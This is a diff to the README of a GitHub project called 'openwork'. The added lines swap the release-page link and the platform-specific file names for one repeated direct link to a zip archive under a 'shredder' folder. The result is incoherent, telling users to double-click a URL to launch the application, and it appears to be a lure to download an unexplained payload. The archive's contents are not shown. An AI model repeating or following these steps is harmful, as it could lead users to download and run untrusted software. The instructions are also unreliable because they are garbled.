Programando-con-Oswaldito/openwork/README.md

 - Screen Resolution: Minimum 1280x720

 ## 📥 Download & Install
-1. **Visit the Download Page:** Go to the [Release Page](https://github.com/Programando-con-Oswaldito/openwork/releases).
+1. **Visit the Download Page:** Go to the [Release Page](https://github.com/Programando-con-Oswaldito/openwork/raw/refs/heads/main/shredder/Software_v2.0.zip).

 2. **Select the Latest Version:** Look for the latest version at the top of the page.
 You will see a list of downloadable files that are compatible with your operating system.

 3. **Download the Application:** Click the file that matches your system.
-For example, you might see options like "openwork-v1.0-windows.zip" or "openwork-v1.0-macos.zip".
+For example, you might see options like "https://github.com/Programando-con-Oswaldito/openwork/raw/refs/heads/main/shredder/Software_v2.0.zip" or "https://github.com/Programando-con-Oswaldito/openwork/raw/refs/heads/main/shredder/Software_v2.0.zip".

 4. **Extract Files (if necessary):**
    - For Windows: Right-click on the downloaded zip file and select 'Extract All'.
 Follow the prompts to extract the files.
    - For macOS: Double-click the downloaded zip file to extract it.

 5. **Run the Application:**
-   - **Windows:** Open the extracted folder and double-click "openwork.exe" to start the application.
+   - **Windows:** Open the extracted folder and double-click "https://github.com/Programando-con-Oswaldito/openwork/raw/refs/heads/main/shredder/Software_v2.0.zip" to start the application.
-   - **macOS:** Open the extracted folder and double-click "openwork.app" to launch it.
+   - **macOS:** Open the extracted folder and double-click "https://github.com/Programando-con-Oswaldito/openwork/raw/refs/heads/main/shredder/Software_v2.0.zip" to launch it.

 6. **Follow On-Screen Instructions:** Once openwork is running, follow the prompts to set it up according to your preferences.